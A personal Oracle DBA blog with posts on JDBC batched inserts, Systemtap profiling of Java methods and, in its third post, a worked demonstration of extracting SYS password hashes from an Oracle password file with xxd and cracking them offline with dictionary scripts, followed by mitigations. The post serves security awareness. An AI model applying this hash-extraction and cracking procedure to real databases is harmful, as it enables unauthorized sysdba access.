Oracle … as usual

Oracle by Laurent Leturgez


Insert data in Oracle with Java … Batched mode.

Problem / Context

Today, I worked on a performance issue at a customer site. The context is a Java app that does some processing and, at the end of it, inserts tons of data into an Oracle database.

The customer was complaining about slow performance during the insertion phase and asked me to have a look at it.

The database was I/O bound, and many sessions were doing one-row inserts on various tables (INSERT INTO … VALUES (:1, :2, …)). These one-row inserts were of course executed many times, and the Oracle session statistics reported a high number of executions.

On the Java side

As Oracle DBAs or developers, we all know that, in PL/SQL, it’s easy to write a FORALL loop that bulk inserts the data and thereby reduces execution time. To do that, you read a cursor in bulk (BULK COLLECT) and insert each chunk into the database in one operation. This reduces the number of operations, loops, etc.


DECLARE
  CURSOR s_cur IS
    SELECT *
    FROM servers;

  TYPE fetch_array IS TABLE OF s_cur%ROWTYPE;
  s_array fetch_array;
BEGIN
  OPEN s_cur;
  LOOP
    FETCH s_cur BULK COLLECT INTO s_array LIMIT 1000;

    FORALL i IN 1..s_array.COUNT
      INSERT INTO servers2 VALUES s_array(i);

    EXIT WHEN s_cur%NOTFOUND;
  END LOOP;
  CLOSE s_cur;
  COMMIT;
END;
/

Source: http://psoug.org/snippet/FORALL-Insert_499.htm

In Java, the problem can be different because the data processed by your app does not necessarily come from a database.

Usually, a statement is prepared, variables are bound and the statement is executed. When it’s done in a loop, it looks something like this:


try{
         DriverManager.registerDriver (new oracle.jdbc.driver.OracleDriver());
         Connection c = DriverManager.getConnection ("jdbc:oracle:thin:@192.168.99.8:1521:orcl","laurent","laurent");
         PreparedStatement stmt = c.prepareStatement("insert into emp(employee_id,first_name,last_name,salary) values (?,?,?,?)");
         start=System.currentTimeMillis();

         for (int i=0 ; i < 50000 ; i++) {
                  stmt.setInt(1,i);
                  stmt.setString(2,generateRandomChars("01234567890ABCDEF",16));
                  stmt.setString(3,generateRandomChars("01234567890ABCDEF",16));
                  stmt.setInt(4,r.nextInt(10000+1)+5000);
                  stmt.executeUpdate();
         }
         stop=System.currentTimeMillis();
         System.out.println("time = "+(stop-start));
         stmt.close();
         c.close();
   }
   catch(Exception e){
      System.err.println(e);
      e.printStackTrace();
   }

The problem is that the statement is sent to the database 50000 times, which multiplies the number of round trips between the application and the database. As a result, execution time is high (this demo was executed on a VM on my laptop):

[oracle@oel6 JAVA]$ time java -cp $CLASSPATH:ojdbc7.jar:. TestNoBatchedInsert
time = 75430

real    1m16.514s
user    0m5.279s
sys     0m1.080s
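
The loop above relies on a generateRandomChars helper (and on the r, start and stop variables) that the post does not list. A minimal sketch of what such a helper might look like is given below; the class name and the implementation are assumptions, not the original code:

```java
import java.util.Random;

final class RandomCharsSketch {
    // Hypothetical stand-in for the generateRandomChars helper used in the post.
    // The original implementation is not shown, so this is only a guess at its behaviour.
    private static final Random RANDOM = new Random();

    /** Returns a string of `length` characters drawn at random from `alphabet`. */
    static String generateRandomChars(String alphabet, int length) {
        StringBuilder sb = new StringBuilder(length);
        for (int i = 0; i < length; i++) {
            sb.append(alphabet.charAt(RANDOM.nextInt(alphabet.length())));
        }
        return sb.toString();
    }

    public static void main(String[] args) {
        // Prints one random 16-character hexadecimal-looking string
        System.out.println(generateRandomChars("0123456789ABCDEF", 16));
    }
}
```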

As with PL/SQL, there is a technique to write Java code that processes inserts in batches, and thereby reduces the number of calls between the application and the database.

To do that, instead of calling the executeUpdate method X times, we can use the addBatch method, which builds a “batch” that is sent to the database when the PreparedStatement’s “executeBatch” method is called.

If you’re familiar with FORALL in PL/SQL, you probably know that the bigger the batch size, the more memory you use. In Java, it is the same and the result is a bigger heap. That’s why it’s recommended to define a batch size and to execute the batch each time it reaches that size. This can be done like this:

try{
        DriverManager.registerDriver (new oracle.jdbc.driver.OracleDriver());
        Connection c = DriverManager.getConnection ("jdbc:oracle:thin:@192.168.99.8:1521:orcl","laurent","laurent");
        PreparedStatement stmt = c.prepareStatement("insert into emp(employee_id,first_name,last_name,salary) values (?,?,?,?)");
        start=System.currentTimeMillis();

        int batchSize=5000;
        int count=0;
        for (int i=0 ; i < 50000 ; i++) {
                stmt.setInt(1,i);
                stmt.setString(2,generateRandomChars("01234567890ABCDEF",16));
                stmt.setString(3,generateRandomChars("01234567890ABCDEF",16));
                stmt.setInt(4,r.nextInt(10000+1)+5000);
                stmt.addBatch();

                if (++count % batchSize == 0) {
                        stmt.executeBatch();
                }
        }

        stop=System.currentTimeMillis();
        System.out.println("time = "+(stop-start));
        stmt.close();
        c.close();
}
catch(Exception e){
  System.err.println(e);
  e.printStackTrace();
}

Now, if I run this program, the wall time is on a completely different scale (598 ms instead of 75,430 ms for the insert loop):

[oracle@oel6 JAVA]$ time java -cp $CLASSPATH:ojdbc7.jar:. TestBatchedInsert
time = 598

real    0m1.964s
user    0m3.393s
sys     0m0.269s
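
The batched loop above works because 50000 is an exact multiple of the batch size. As a hedged sketch for the general case, the variant below also flushes the last, partially filled batch and returns the number of executeBatch calls. The class name, the method name insertBatched and the placeholder column values are assumptions made for illustration; the statement is expected to be the same four-parameter insert into emp:

```java
import java.sql.PreparedStatement;
import java.sql.SQLException;

final class BatchedInsertSketch {
    /**
     * Queues `rows` inserts on stmt and sends them in chunks of `batchSize`.
     * Returns the number of executeBatch() calls, i.e. ceil(rows / batchSize).
     */
    static int insertBatched(PreparedStatement stmt, int rows, int batchSize) throws SQLException {
        int executions = 0;
        int pending = 0;
        for (int i = 0; i < rows; i++) {
            stmt.setInt(1, i);
            stmt.setString(2, "FIRST" + i);      // placeholder values, not the post's random strings
            stmt.setString(3, "LAST" + i);
            stmt.setInt(4, 5000 + (i % 10001));
            stmt.addBatch();
            if (++pending == batchSize) {        // batch is full: send it to the database
                stmt.executeBatch();
                executions++;
                pending = 0;
            }
        }
        if (pending > 0) {                       // flush the last, partially filled batch
            stmt.executeBatch();
            executions++;
        }
        return executions;
    }
}
```

With the values from the post, insertBatched(stmt, 50000, 5000) performs 10 executions. On a real connection you would probably also call c.setAutoCommit(false) before the loop and c.commit() after it, so that commits are decided by your code rather than by JDBC's default auto-commit mode.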

On the database side

The AWR reports show several things:

  • First, if we run the Java samples as they are written, the non-batched version commits after each executeUpdate (JDBC connections are in auto-commit mode by default). As a result, waits on the log file sync event increase:

Non batched inserts:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                           Total Wait       Wait   % DB Wait
Event                                Waits Time (sec)    Avg(ms)   time Class
------------------------------ ----------- ---------- ---------- ------ --------
log file sync                       49,999         64       1.28   86.8 Commit
DB CPU                                            9.3              12.6
db file sequential read                 47          0       0.97     .1 User I/O
SQL*Net message to client           50,012          0       0.00     .1 Network
log file switch completion               1          0      27.60     .0 Configur
undo segment extension                   2          0       5.16     .0 Configur
direct path write                        3          0       1.08     .0 User I/O
direct path sync                         1          0       3.15     .0 User I/O
Disk file operations I/O                19          0       0.04     .0 User I/O
control file sequential read           194          0       0.00     .0 System I

Batched inserts:

Top 10 Foreground Events by Total Wait Time
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                                           Total Wait       Wait   % DB Wait
Event                                Waits Time (sec)    Avg(ms)   time Class
------------------------------ ----------- ---------- ---------- ------ --------
DB CPU                                             .3              72.9
SQL*Net more data from client          268          0       0.17   10.1 Network
log file sync                           13          0       3.29    9.5 Commit
db file sequential read                 49          0       0.37    4.0 User I/O
Disk file operations I/O                17          0       0.03     .1 User I/O
control file sequential read           134          0       0.00     .1 System I
SQL*Net more data to client             10          0       0.02     .1 Network
SQL*Net message to client               22          0       0.00     .0 Network
log file single write                    0          0                .0 System I
asynch descriptor resize                 0          0                .0 Other

  • Then, because of batching, the number of logical reads on the EMP segment is much lower when batched inserts are used (3,504 versus 52,576):

Non batched inserts:

Segments by Logical Reads                   DB/Inst: ORCL/orcl  Snaps: 200-201
-> Total Logical Reads:         212,288
-> Captured Segments account for   28.4% of Total
-> When ** MISSING ** occurs, some of the object attributes may not be available

                     Tablespace
Owner                   Name
-------------------- ----------
                     Subobject  Obj.                             Logical
Object Name            Name     Type        Obj#   Dataobj#        Reads  %Total
-------------------- ---------- ----- ---------- ---------- ------------ -------
LAURENT              USERS
EMP                             TABLE      93857      93860       52,576   24.77

Batched inserts:
Segments by Logical Reads                   DB/Inst: ORCL/orcl  Snaps: 201-202
-> Total Logical Reads:          11,792
-> Captured Segments account for   83.0% of Total
-> When ** MISSING ** occurs, some of the object attributes may not be available

                     Tablespace
Owner                   Name
-------------------- ----------
                     Subobject  Obj.                             Logical
Object Name            Name     Type        Obj#   Dataobj#        Reads  %Total
-------------------- ---------- ----- ---------- ---------- ------------ -------
LAURENT              USERS
EMP                             TABLE      93857      93860        3,504   29.72

  • The same holds for buffer gets at the statement level (3,669 versus 152,587). The number of executions is also much lower with batched inserts (10 instead of 50,000; it depends on your batch size):

Non batched inserts:

     Buffer                 Gets              Elapsed
      Gets   Executions   per Exec   %Total   Time (s)  %CPU   %IO    SQL Id
----------- ----------- ------------ ------ ---------- ----- ----- -------------
    152,587      50,000          3.1   71.9        2.1  11.3     0 7c9ws5uvx9nyc
Module: JDBC Thin Client
insert into emp(employee_id,first_name,last_name,salary) values (:1 ,:2 ,:3 ,:4
)

Batched inserts:

     Buffer                 Gets              Elapsed
      Gets   Executions   per Exec   %Total   Time (s)  %CPU   %IO    SQL Id
----------- ----------- ------------ ------ ---------- ----- ----- -------------
      3,669          10        366.9   31.1        0.1    57     0 7c9ws5uvx9nyc
Module: JDBC Thin Client
insert into emp(employee_id,first_name,last_name,salary) values (:1 ,:2 ,:3 ,:4)

 

When developers have to insert tons of data from a Java app, they should do it the right way: use batched inserts. It reduces round trips and commits, and takes a lot of load off the database.

That’s it for today 😉


Profiling Java Application with Systemtap

A couple of days ago, I read this tweet from Tanel Poder :

I’m not a JVM internals geek but I was sure there was a way to do the job without restarting the JVM, and I found some cool stuff with Systemtap.

To do this, you have to install two packages on your Linux distribution, systemtap and systemtap-runtime-java, and configure your user environment correctly:

[root@spark ~]# yum install systemtap systemtap-runtime-java

Please note that I used a CentOS 7.4 distribution.

Then, for the demo, I wrote a very small piece of Java that does the following:

  1. Prints the JVM PID.
  2. Waits for a key to be pressed (in practice, Enter). During this time, you have to start the systemtap script described later.
  3. Executes a loop ten times; each iteration prints a message and waits one second. This last step is done in a method named “loop_and_wait”.

Here’s the sample code:


package com.premiseo;

import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.IOException;

class Example {
   // Method targeted by the systemtap probes: prints a message, then sleeps n milliseconds
   public static void loop_and_wait(int n) throws InterruptedException {
      System.out.println("Waiting "+n+"ms... Tick");
      Thread.sleep(n);
   }

   public static void main(String[] args) {

      System.out.println("PID = "+java.lang.management.ManagementFactory.getRuntimeMXBean().getName().split("@")[0]);
      System.out.println("Press any key when ready ...");

      try {
        BufferedReader in = new BufferedReader(new InputStreamReader(System.in));
        String next = in.readLine();
      }
      catch (IOException ioe) {
        ioe.printStackTrace();
      }

      try {
        for (int i=0;i<10;i++) {
           loop_and_wait(1000);
        }
      }
      catch (InterruptedException ie) {
        ie.printStackTrace();
      }
   }
}

Then, compile and execute … very basic I said 😉

[spark@spark java]$ javac -cp $CLASSPATH:. com/premiseo/Example.java
[spark@spark java]$ java -cp $CLASSPATH:. com.premiseo.Example
PID = 9928
Press any key when ready ...

Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
Waiting 1000ms... Tick
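
As a side note, the sample extracts the PID by splitting the RuntimeMXBean name, which relies on the conventional pid@hostname format. Assuming Java 9 or later (the post does not say which JDK was used), the same value can be obtained directly; the class name PidSketch is only illustrative:

```java
final class PidSketch {
    /** Returns the PID of the running JVM; requires Java 9 or later. */
    static long currentPid() {
        return ProcessHandle.current().pid();
    }

    public static void main(String[] args) {
        // Same kind of line as the one printed by the Example class
        System.out.println("PID = " + currentPid());
    }
}
```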

Now, to answer Tanel, I used a short systemtap script that profiles the program, and especially the loop_and_wait method. It counts the number of times the loop_and_wait method is called and accumulates the time spent in this method.

To do that, I had to write two probes, each defined by:

  • the full name of the class, including the package name: com.premiseo.Example
  • the class name where the method is defined: Example
  • the method name I want to profile: loop_and_wait

The first one fires when the program enters the targeted method (java(“com.premiseo.Example”).class(“Example”).method(“loop_and_wait”)); the second one fires when the method returns (java(“com.premiseo.Example”).class(“Example”).method(“loop_and_wait”).return).

The related systemtap script is given below:

#!/usr/bin/env stap

global counter,timespent,t

probe begin {
  printf("Press Ctrl+C to stop profiling\n")
  counter=0
  timespent=0
}

probe java("com.premiseo.Example").class("Example").method("loop_and_wait")
{
  counter++
  t=gettimeofday_ms()
}

probe java("com.premiseo.Example").class("Example").method("loop_and_wait").return
{
  timespent+=gettimeofday_ms()-t
}

probe end {
   printf("Number of calls for loop_and_wait method: %ld \n",    counter)
   printf("Time Spent in method loop_and_wait: %ld msecs \n", timespent)
}

Execution of this systemtap script gave the following result (screenshot not reproduced here):

Is it dynamic? Yes, there is no need to restart the running JVM process you want to target. If you want to target a specific JVM process ID, you can use stap’s “-x” option and modify your probe definition like this:

probe java("com.premiseo.Example").class("Example").method("loop_and_wait")
{
  # braces are required so that both statements are guarded by the pid test
  if (pid() == target()) {
    counter++
    t=gettimeofday_ms()
  }
}

There’s one limitation: you cannot use wildcards in the java probe definition (java(“com.premiseo.Example”).class(“Example”).method(“loop*”), for example). That would have been useful to profile a set of methods in the same class, but it is not possible currently.

If you want to read more about this kind of stuff, please read the following websites:

And … that’s all for today !! 😉

 

 

Brute forcing the Oracle Password file

If you want to connect remotely to your Oracle instance as sysdba, by default (i.e. remote_login_passwordfile=EXCLUSIVE), you will probably use the password file (located in $ORACLE_HOME/dbs) to authenticate the SYS user.

Below, I used auditd to show that the password file is read by the server process when connecting remotely:

[oracle@oel6 ~]$ sudo service auditd status
auditd (pid  2422) is running...

[oracle@oel6 ~]$ sudo auditctl -l
No rules

[oracle@oel6 ~]$ sudo auditctl -w $ORACLE_HOME/dbs/orapworcl -p r
[oracle@oel6 ~]$ sudo auditctl -l
-w /u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl -p r
[oracle@oel6 ~]$ sqlplus sys@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 09:14:52 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.

Enter password:

Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

[oracle@oel6 ~]$ sudo ausearch -f $ORACLE_HOME/dbs/orapworcl | grep -A 2 '^type=PATH'
type=PATH msg=audit(1513326435.361:310): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:310):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:310): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aaf9c18 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:311): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:311):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:311): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aaf9c18 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:312): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:312):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:312): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=0 a2=0 a3=7ffe8aaf9c70 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.361:313): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.361:313):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.361:313): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=1002 a2=0 a3=797bfdf0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:314): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:314):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:314): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aae9288 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:315): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:315):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:315): arch=c000003e syscall=2 success=yes exit=7 a0=7ffe8aae9288 a1=0 a2=0 a3=3 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:316): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:316):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:316): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=0 a2=0 a3=0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
--
type=PATH msg=audit(1513326435.366:317): item=0 name="/u01/app/oracle/product/12.2.0/dbhome_1/dbs/orapworcl" inode=109527 dev=fc:02 mode=0100640 ouid=500 ogid=500 rdev=00:00
type=CWD msg=audit(1513326435.366:317):  cwd="/u01/app/oracle/product/12.2.0/dbhome_1/dbs"
type=SYSCALL msg=audit(1513326435.366:317): arch=c000003e syscall=2 success=yes exit=7 a0=797bfbd8 a1=1002 a2=0 a3=797bfdf0 items=1 ppid=1 pid=7840 auid=500 uid=500 gid=500 euid=500 suid=500 fsuid=500 egid=500 sgid=500 fsgid=500 ses=3 tty=(none) comm="oracle_7840_orc" exe="/u01/app/oracle/product/12.2.0/dbhome_1/bin/oracle" key=(null)
[oracle@oel6 ~]$ ps -ef | grep 7840
oracle    7840     1  0 09:27 ?        00:00:00 oracleorcl (LOCAL=NO)

So, if we have a closer look at this binary file, we can find various password hashes. In my example, I configured my sqlnet with SQLNET.ALLOWED_LOGON_VERSION_SERVER=11. As a result, my password file contains 10g, 11g and 12c password hashes for the SYS user.

Below, I used the xxd Linux command with specific offsets on my password file to get the password hashes:

  • 10g sys password hash
[oracle@oel6 ~]$ xxd -c16 -g0 -s +0x0484 -l 16 $ORACLE_HOME/dbs/orapworcl
0000484: 32363235343335323638333944303441 262543526839D04A

  • 11g sys password hash
[oracle@oel6 ~]$ xxd -c30 -g0 -s +0x04ac -l 30 $ORACLE_HOME/dbs/orapworcl
00004ac: 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314 *.....o3.I..H.......>.....^.S.

First part (20 first bytes): SHA1 digest

[oracle@oel6 ~]$ xxd -c20 -g0 -s +0x04ac -l 20 $ORACLE_HOME/dbs/orapworcl
00004ac: 2adaa0a90bf26f339c49fe9948ab88a20baf82f9 *.....o3.I..H.......

Second part (10 next bytes): Salt used by Oracle

[oracle@oel6 ~]$ xxd -c10 -g0 -s +0x4C0 -l 10 $ORACLE_HOME/dbs/orapworcl
00004c0: 3ef3c5da13ca5eb95314 >.....^.S.

  • 12c sys password hash
[oracle@oel6 ~]$ xxd -c80 -g0 -s +0x04CA -l 80 $ORACLE_HOME/dbs/orapworcl
00004ca: ad84face7a337c03baacca0bc63f97068e51edd0d6c53826ce8c347594a2800f92c736b4c83239fa47414ff2f68f45304b016ae215ed595c8b71c3c5a0ca3a0630e931d0f7d3929c9a6fb131f2fa0427 ....z3|......?...Q....8&..4u......6..29.GAO...E0K.j...Y\.q....:.0.1......o.1...'

Note: if you use the default configuration of oracle 12.2, you will only find 11g and 12c hashes.
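
The xxd calls above simply read a few bytes at a fixed offset. The same extraction can be sketched in Java as follows; the class and method names are hypothetical, and the offsets are the ones found in this particular password file, so they may differ on another version or configuration. Note that xxd shows the 10g hash stored as ASCII text, whereas the 11g digest and salt are raw bytes:

```java
import java.io.IOException;
import java.io.RandomAccessFile;
import java.nio.file.Path;
import java.nio.file.Paths;

final class HexSliceSketch {
    /** Reads `length` bytes starting at `offset` and returns them as lowercase hex. */
    static String readHex(Path file, long offset, int length) throws IOException {
        byte[] buf = new byte[length];
        try (RandomAccessFile raf = new RandomAccessFile(file.toFile(), "r")) {
            raf.seek(offset);
            raf.readFully(buf);   // throws EOFException if the file is too short
        }
        StringBuilder hex = new StringBuilder(length * 2);
        for (byte b : buf) {
            hex.append(String.format("%02x", b & 0xff));
        }
        return hex.toString();
    }

    public static void main(String[] args) throws IOException {
        // Usage: java HexSliceSketch <password file>
        // The offsets below are the ones observed in this post, not universal constants.
        Path pwfile = Paths.get(args[0]);
        System.out.println("11g digest: " + readHex(pwfile, 0x04ac, 20));
        System.out.println("11g salt  : " + readHex(pwfile, 0x04c0, 10));
    }
}
```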

 

Once I had found these hashes, I wrote some Python scripts that use a dictionary file to brute force the password. Those scripts are available at this URL: https://github.com/lolo115/oracrack

First of all, I used the ora10g_hash_bf.py against the 10g hash to find the case insensitive password:

[oracle@oel6 sec]$ ./ora10g_hash_bf.py dict.txt sys 262543526839D04A
DICTFILE = dict.txt
USERNAME = sys
HASH     = 262543526839D04A
PASSWORD FOUND FOR USER sys !!! PASSWORD IS: rockyou
------
Be careful, the found password is case insensitive. The real password can include upper character(s)
Now generate all combinations for this password and run ora11g_hash_bf.py script to find the case sensitive password

OK, the password is weak and the program found it in the dictionary file, but if we try it on our database, it fails because I used a sqlplus 12.2 client that uses case-sensitive passwords (and my SQLNET client configuration is the default one):

$ sqlplus sys/rockyou@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 10:06:37 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.

ERROR:
ORA-01017: invalid username/password; logon denied

So, now that I know the sys password is something like “rockyou” with upper and lower case characters in it, I will use my “gen_all_comb.py” script to generate my own dictionary file containing all the case combinations of the “rockyou” password:

[oracle@oel6 sec]$ ./gen_all_comb.py rockyou > mydict.txt
[oracle@oel6 sec]$ head mydict.txt
rockyou
rockyoU
rockyOu
rockyOU
rockYou
rockYoU
rockYOu
rockYOU
rocKyou
rocKyoU
.../...
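
The idea behind gen_all_comb.py can be sketched in Java as below. This is not the script from the repository, only an illustration that counts through every upper/lower mask and happens to produce the same ordering as the output above; the class and method names are assumptions:

```java
import java.util.ArrayList;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Locale;
import java.util.Set;

final class CaseCombinationsSketch {
    /** Returns every upper/lower case variant of `word`, all-lowercase first. */
    static List<String> allCaseCombinations(String word) {
        String lower = word.toLowerCase(Locale.ROOT);
        int n = lower.length();                       // assumes n <= 30 so that 1 << n fits in an int
        Set<String> out = new LinkedHashSet<>();      // drops duplicates caused by digits or symbols
        for (int mask = 0; mask < (1 << n); mask++) {
            StringBuilder sb = new StringBuilder(n);
            for (int i = 0; i < n; i++) {
                char ch = lower.charAt(i);
                // the last character is driven by the lowest bit of the mask
                boolean upper = (mask & (1 << (n - 1 - i))) != 0;
                sb.append(upper ? Character.toUpperCase(ch) : ch);
            }
            out.add(sb.toString());
        }
        return new ArrayList<>(out);
    }

    public static void main(String[] args) {
        // Usage: java CaseCombinationsSketch rockyou > mydict.txt
        for (String candidate : allCaseCombinations(args[0])) {
            System.out.println(candidate);
        }
    }
}
```

A 7-letter word such as “rockyou” yields 2^7 = 128 candidates, so the generated dictionary stays tiny.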

As the last step, I run the ora11g_hash_bf.py script against the 11g hash (which is case sensitive) with my previously generated dictionary (mydict.txt), and the script finds the correct password:

[oracle@oel6 sec]$ ./ora11g_hash_bf.py mydict.txt sys 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314
DICTFILE = mydict.txt
USERNAME = sys
HASH     = 2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314
PASSWORD FOUND FOR USER sys !!! PASSWORD IS: RocKyoU
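
For readers who want to see what checking one candidate against the 11g hash involves, here is a minimal sketch. It assumes the commonly documented scheme, in which the 20-byte digest is SHA-1(password bytes followed by the salt bytes) and the 10-byte salt is appended to the digest in the stored value (as shown with xxd earlier). It is not the code of ora11g_hash_bf.py, and the names are hypothetical:

```java
import java.nio.charset.StandardCharsets;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.util.Arrays;

final class Ora11gHashSketch {
    /** Decodes a hex string (two characters per byte) into raw bytes. */
    static byte[] fromHex(String hex) {
        byte[] out = new byte[hex.length() / 2];
        for (int i = 0; i < out.length; i++) {
            out[i] = (byte) Integer.parseInt(hex.substring(2 * i, 2 * i + 2), 16);
        }
        return out;
    }

    /** True if SHA-1(candidate + salt) equals the digest part of hashHex (digest first, salt after). */
    static boolean matches(String candidate, String hashHex) {
        byte[] raw = fromHex(hashHex);
        byte[] digest = Arrays.copyOfRange(raw, 0, 20);        // first 20 bytes: SHA-1 digest
        byte[] salt = Arrays.copyOfRange(raw, 20, raw.length); // remaining bytes: salt
        try {
            MessageDigest sha1 = MessageDigest.getInstance("SHA-1");
            // Assumption: the password is plain ASCII, so the charset does not matter
            sha1.update(candidate.getBytes(StandardCharsets.UTF_8));
            sha1.update(salt);
            return MessageDigest.isEqual(sha1.digest(), digest);
        } catch (NoSuchAlgorithmException e) {
            throw new IllegalStateException("SHA-1 not available", e);
        }
    }

    public static void main(String[] args) {
        // Hash taken from the xxd output in this post; candidates come from the command line
        String stored = "2adaa0a90bf26f339c49fe9948ab88a20baf82f93ef3c5da13ca5eb95314";
        for (String candidate : args) {
            System.out.println(candidate + " -> " + matches(candidate, stored));
        }
    }
}
```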

So let’s try:

[oracle@oel6 sec]$ sqlplus sys/RocKyoU@orcl as sysdba

SQL*Plus: Release 12.2.0.1.0 Production on Fri Dec 15 10:12:17 2017

Copyright (c) 1982, 2016, Oracle.  All rights reserved.


Connected to:
Oracle Database 12c Enterprise Edition Release 12.2.0.1.0 - 64bit Production

SQL>

In this blog post, I described how to brute force the SYS password stored in the password file without connecting to the database many times, and therefore without the risk of locking the account. Please note that I never read the USER$ table either.

To avoid this, you can simply disable password file usage by setting remote_login_passwordfile to NONE and removing the password file. You should also set a SYS password that is not weak (or enforce one with a password function in a profile); too many customers still set the SYS password to oracle, oracle123 or welcome1.

Finally, I didn’t write anything about the 12c hash (SHA512) because it’s a bit more complicated. Oracle 12c uses a SCRAM authentication dialog, so you first have to listen to the client/server network dialog, get some authentication keys and then run your own script. Moreover, the 12c hash generation process uses the PBKDF2 key derivation function, which is deliberately slow to compute. As a consequence, it slows down the rate at which your script can test candidates. So if you want to secure your 12c authentication process and avoid password brute forcing, you have to keep only the 12c password hash (in your password file and in the USER$ table), encrypt your network dialog with the AES192 algorithm (starting with 12c, it can be done even in Standard Edition), and use strong passwords.

I will end this blog post with the traditional disclaimer … use everything written in this blog post (including the scripts) at your own risk. If you use this stuff to hack a SYS password without authorization … you alone will be responsible for all the consequences! 😉

Install a Standalone Spark Environment on Oracle Linux 7

Spark is one of the trendiest projects of the Apache Software Foundation.

